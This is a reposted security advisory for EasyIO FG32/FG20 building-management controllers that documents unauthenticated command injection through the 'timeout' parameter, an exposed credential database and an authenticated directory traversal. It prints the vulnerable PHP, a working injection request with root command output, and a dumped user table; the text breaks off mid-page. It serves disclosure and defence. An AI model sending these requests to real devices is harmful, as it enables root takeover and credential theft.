{"id":6272,"date":"2017-01-23T14:07:50","date_gmt":"2017-01-23T22:07:50","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-123\/"},"modified":"2017-01-23T14:07:50","modified_gmt":"2017-01-23T22:07:50","slug":"news-123","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-123\/","title":{"rendered":"SSD Advisory &#8211; EasyIO Multiple Vulnerabilities"},"content":{"rendered":"<div class=\"entry-content\">\n<p><strong><u>Vulnerability Summary<\/u><\/strong><\/p>\n<p>The following advisory describes three (3) vulnerabilities that allow an attacker to gain unauthenticated remote code execution. EasyIO provides products for Building Energy Management Systems: low costs, high energy savings.<\/p>\n<p>The three vulnerabilities found in EasyIO are:<\/p>\n<ul>\n<li>Unauthenticated remote code execution<\/li>\n<li>Unauthenticated database file download<\/li>\n<li>Authenticated directory traversal vulnerability<\/li>\n<\/ul>\n<p>The vulnerabilities affect the following products:<\/p>\n<ul>\n<li>EasyIO FG Series, FG32<\/li>\n<li>EasyIO FG Series, FG20<\/li>\n<\/ul>\n<p><strong><u>Credit<\/u><\/strong><br \/> An independent security researcher has reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong><em>Unauthenticated remote code execution vulnerability<\/em><\/strong><\/p>\n<p><em><u>Vulnerable code<\/u>:<\/em><br \/> The <em>$timeout<\/em> parameter lacks a sanity check: it is read straight from the request and concatenated into a command line that is run by <em>exec()<\/em>, so an attacker can insert malicious content into the <em>$timeout<\/em> parameter and have it executed as root.<\/p>\n<div id=\"crayon-58867eb52c05b742605069\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; 
font-size: 12px !important; line-height: 15px !important;\">{\"data\": \"&lt;?php\n\/\/vim: ts=2 sw=2\n\nclass BacnetController {\n\tpublic function run() {\n\t\tsession_start();\n\n\t\t$method = $_SERVER['REQUEST_METHOD'];\n\t\tif ($method == \"POST\") {\n\t\t\t\t$this-&gt;doPost();\n\t\t}\n\t\telse if ($method == \"GET\") {\n\t\t\t$this-&gt;doGet();\n\t\t}\n\t}\n\n\tprotected function doGet() {\n\t\t$action = $_GET['action'];\n\t\t$response = array();\n\t\tif ($action == 'discoverDevices') {\n\t\t\t$lowLimit = $_GET['lowLimit'];\n\t\t\t$highLimit = $_GET['highLimit'];\n\t\t\t$timeout = $_GET['timeout']; \/\/1 vuln parameter: taken from the query string without validation\n\t\t\t$cmd = 'bacnet device -d all ' . $lowLimit . ' ' . $highLimit . ' ' . $timeout; \/\/2 concatenated unquoted into a shell command line\n\t\t\t\/\/ $cmd = 'bacnet device -d mstp ' . $lowLimit . ' ' . $highLimit . ' ' . $timeout;\n\t\t\t$output = array();\n\t\t\texec($cmd, $output); \/\/3 the command line is handed to the shell\n\n\t\t\tarray_push($response, 'SUCCESS:', '');\n\t\t\t$response = array_merge($response, $output);\n\t\t\tdie(implode(\"\n\t\t\t\", $response));\n\t\t}\n\t\telse if ($action == 'discoverObjects') {\n\t\t\t$deviceId = $_GET['deviceId'];\n\t\t\t$linkType = $_GET['linkType'];\n\t\t\tif (strcasecmp($linkType, \"MSTP\") == 0)\n\t\t\t\t$cmd = 'bacnet point -d mstp ' . $deviceId;\n\t\t\telse if (strcasecmp($linkType, \"B\/IP\") == 0 || strcasecmp($linkType, \"IP\") == 0)\n\t\t\t\t$cmd = 'bacnet point -d ip ' . $deviceId;\n\t\t\telse {\n\t\t\t\terror_log(\"invalid link type: \" . $linkType);\n\t\t\t\t$cmd = 'bacnet point -d mstp ' . $deviceId;\n\t\t\t}\n\n\t\t\t$output = array();\n\t\t\texec($cmd, $output);\n\n\t\t\tarray_push($response, 'SUCCESS:', '');\n\t\t\t$response = array_merge($response, $output);\n\t\t\tdie(implode(\"\n\t\t\t\", $response));\n\t\t}\n\t\telse\n\t\t\tdie('ERROR: not supported action: ' . $action);\n\t}\n\n\tprotected function doPost() {\n\t}\n}\n\n$controller = new BacnetController();\n$controller-&gt;run();\n\n?&gt;\n\",\"actionPermitted\": \"true\",\"home_page\": \"\"}<\/textarea><\/div>\n<\/div>\n<p><u><em>Proof of Concept<\/em><\/u><\/p>\n<p>An attacker sending the following request:<\/p>\n<div id=\"crayon-58867eb52c06a006394427\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">GET \/sdcard\/cpt\/scripts\/bacnet.php?action=discoverDevices&amp;lowLimit=0&amp;highLimit=0&amp;timeout=0%26whoami%26uname%20-a%26ls HTTP\/1.1\nHost: 192.168.0.16\nAccept: application\/json, text\/javascript, *\/*; q=0.01\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/49.0.2623.75 Safari\/537.36\nReferer: http:\/\/192.168.0.16\/sdcard\/cpt\/app\/graphic.php?grname=Admin.gr\nAccept-Encoding: gzip, deflate, sdch\nAccept-Language: en-US,en;q=0.8\nConnection: close\nContent-Length: 1<\/textarea><\/div>\n<\/div>\n<p>Will receive from the server the following response, in which the output of the injected commands follows the headers:<\/p>\n<div id=\"crayon-58867eb52c06d206476314\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px 
!important;\"><span class=\"crayon-title\"><\/span><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">HTTP\/1.1 200 OK\nDate: Mon, 07 Mar 2016 08:31:43 GMT\nServer: Embedthis-Appweb\/3.3.2\nContent-Length: 175\nContent-Type: text\/html\nConnection: close\nPragma: no-cache\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nLast-Modified: Mon, 07 Mar 2016 08:31:43 GMT\nContent-type: text\/html\nX-Powered-By: PHP\/5.3.10\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nSet-Cookie: PHPSESSID=f694a07ca04f27cea0dffa9e6a44ade1; path=\/\n\nroot\nLinux FG32-20 2.6.29.2-V2.8 #36 Wed Nov 12 15:06:43 EST 2014 armv4tl unknown\n!!bacnet: Timeout is out of (1 ~ 43200) range\nbacnet.php\ndeployment.php\nos_info.php<\/textarea><\/div>\n<\/div>\n<p><em><strong>Unauthenticated database file download<\/strong><\/em><br \/> The database file is not protected from direct download if the &#8220;right&#8221; URL is provided; the database file includes sensitive information: usernames and passwords, as well as configuration 
settings of the remote device.<\/p>\n<p>The URL where the database is located:<br \/> <em>http:\/\/192.168.0.16\/sdcard\/cpt\/app\/cpt-web.db<\/em><\/p>\n<p>Fetching this URL and loading the file into sqlite returns the following content:<\/p>\n<div id=\"crayon-58867eb52c071080408374\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly 
style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> sqlite&gt; .databases  seq name file   &#8212; &#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-  0 main \/tmp\/cpt-web.db   1 temp   sqlite&gt; .tables  permissions users   sqlite&gt; .schema  CREATE TABLE users (  id INTEGER PRIMARY KEY AUTOINCREMENT,  name varchar(255) NOT NULL UNIQUE,  salt char(16) NOT NULL,  checksum char(56) NOT NULL,  is_admin char(1) DEFAULT &#8216;f&#8217;,  created_at datetime default current_timestamp  , utility_enabled char(1) DEFAULT &#8216;f&#8217;, home_page varchar(255), system_enabled char(1) DEFAULT &#8216;f&#8217;);  CREATE TABLE permissions (  id INTEGER PRIMARY KEY AUTOINCREMENT,  user_id INTEGER NOT NULL,  path varchar(255) NOT NULL,  readable char(1) DEFAULT &#8216;t&#8217;,  writable char(1) DEFAULT &#8216;t&#8217;,  created_at datetime default current_timestamp,  FOREIGN KEY(user_id) REFERENCES users(id)  );  sqlite&gt; select * from users;  1|admin|hNsq25I1KmRfSCOu|dc7b9f203aa5cf1bwe33d5fc126cd783f98595e9|t|1970-01-01 00:09:24|t||t  2|user|2PuRbt9ogdHGS10y|1b5ff0de0610cc42b27cg833d46eb798a1ff9f22|f|2015-03-16 05:47:00|f|Admin.gr|f<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-4\">4<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-58867eb52c071080408374-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-28\">28<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-1\"><span class=\"crayon-v\">sqlite<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">databases<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-2\"><span class=\"crayon-e\">seq <\/span><span class=\"crayon-e\">name <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-3\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span 
class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-4\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">main<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cpt<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">web<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">db<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-5\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">temp <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-6\"><span class=\"crayon-v\">sqlite<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tables<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-7\"><span class=\"crayon-e\">permissions <\/span><span class=\"crayon-e\">users <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-8\"><span class=\"crayon-v\">sqlite<\/span><span 
class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">schema<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-9\"><span class=\"crayon-e\">CREATE <\/span><span class=\"crayon-e\">TABLE <\/span><span class=\"crayon-e\">users<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-10\"><span class=\"crayon-e\">id <\/span><span class=\"crayon-t\">INTEGER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PRIMARY <\/span><span class=\"crayon-e\">KEY <\/span><span class=\"crayon-v\">AUTOINCREMENT<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-11\"><span class=\"crayon-e\">name <\/span><span class=\"crayon-e\">varchar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">UNIQUE<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-12\"><span class=\"crayon-e\">salt <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-13\"><span class=\"crayon-e\">checksum <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">56<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-14\"><span class=\"crayon-e\">is_admin <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;f&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-15\"><span class=\"crayon-e\">created_at <\/span><span class=\"crayon-e\">datetime <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">current<\/span><span class=\"crayon-sy\">_<\/span>timestamp<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-16\"><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">utility_enabled <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;f&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">home_page <\/span><span class=\"crayon-e\">varchar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">system_enabled <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;f&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-17\"><span class=\"crayon-e\">CREATE <\/span><span class=\"crayon-e\">TABLE <\/span><span class=\"crayon-e\">permissions<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-18\"><span class=\"crayon-e\">id <\/span><span class=\"crayon-t\">INTEGER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PRIMARY <\/span><span class=\"crayon-e\">KEY <\/span><span class=\"crayon-v\">AUTOINCREMENT<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-19\"><span class=\"crayon-e\">user_id <\/span><span class=\"crayon-t\">INTEGER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-20\"><span class=\"crayon-e\">path <\/span><span class=\"crayon-e\">varchar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-21\"><span class=\"crayon-e\">readable <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;t&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-22\"><span class=\"crayon-e\">writable <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;t&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-23\"><span class=\"crayon-e\">created_at <\/span><span class=\"crayon-e\">datetime <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">current_timestamp<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-24\"><span class=\"crayon-e\">FOREIGN <\/span><span class=\"crayon-e\">KEY<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user_id<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">REFERENCES <\/span><span class=\"crayon-e\">users<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-25\"><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-26\"><span class=\"crayon-v\">sqlite<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">select *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">users<\/span><span 
class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-27\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">hNsq25I1KmRfSCOu<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">dc7b9f203aa5cf1bwe33d5fc126cd783f98595e9<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">1970<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-i\">t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-28\"><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2PuRbt9ogdHGS10y<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">1b5ff0de0610cc42b27cg833d46eb798a1ff9f22<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">05<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">47<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">|<\/span><span 
class=\"crayon-v\">f<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">Admin<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">gr<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">f<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>The &#8216;checksum&#8217; column is derived from the user-supplied password and the per-user value in the &#8216;salt&#8217; column; the advisory does not say which hash function is used. Note that the schema declares checksum as char(56) while the values above are 40 characters long and contain non-hexadecimal characters (&#8216;w&#8217;, &#8216;g&#8217;), so treat them as illustrative rather than as real digests. Once the hashing scheme is known, the salt and checksum pairs allow offline password recovery.<\/p>\n<p><em><strong>Authenticated directory traversal vulnerability<\/strong><\/em><br \/> <em><u>Vulnerable code<\/u>: grdata.php<\/em><br \/> The handler requires a signed-in user (signinRequired() returns true) but concatenates $_GET[&#8216;grName&#8217;] onto &#8216;.\/grdata\/&#8217; and hands the result to file_get_contents() without normalising it, so a name containing ..\/ segments reads files outside the grdata directory. When isReadable() fails, renderAjaxError() is called but the method does not return, so the read still takes place unless renderAjaxError() itself ends the request; the excerpt does not show that method. The listing below is grdata.php&#8217;s JSON response with the handler&#8217;s own source in its data field:<\/p>\n<div id=\"crayon-58867eb52c074951174095\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" 
